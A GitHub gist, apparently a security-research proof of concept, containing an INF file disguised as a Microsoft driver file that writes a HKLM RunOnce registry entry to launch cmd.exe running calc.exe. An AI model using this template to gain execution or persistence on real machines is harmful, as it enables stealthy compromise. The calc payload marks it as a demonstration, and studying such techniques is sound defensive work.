Skip to content

Instantly share code, notes, and snippets.

@sasqwatch
Forked from bohops/calc_exe.inf
Created January 10, 2019 21:20
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save sasqwatch/57eb225ada748ff1ad63b894f4b2cf89 to your computer and use it in GitHub Desktop.
Save sasqwatch/57eb225ada748ff1ad63b894f4b2cf89 to your computer and use it in GitHub Desktop.
; DRIVER.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385
[DestinationDirs]
DefaultDestDir = 1
[DefaultInstall]
AddReg = CalcStart
[CalcStart]
HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe"""
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment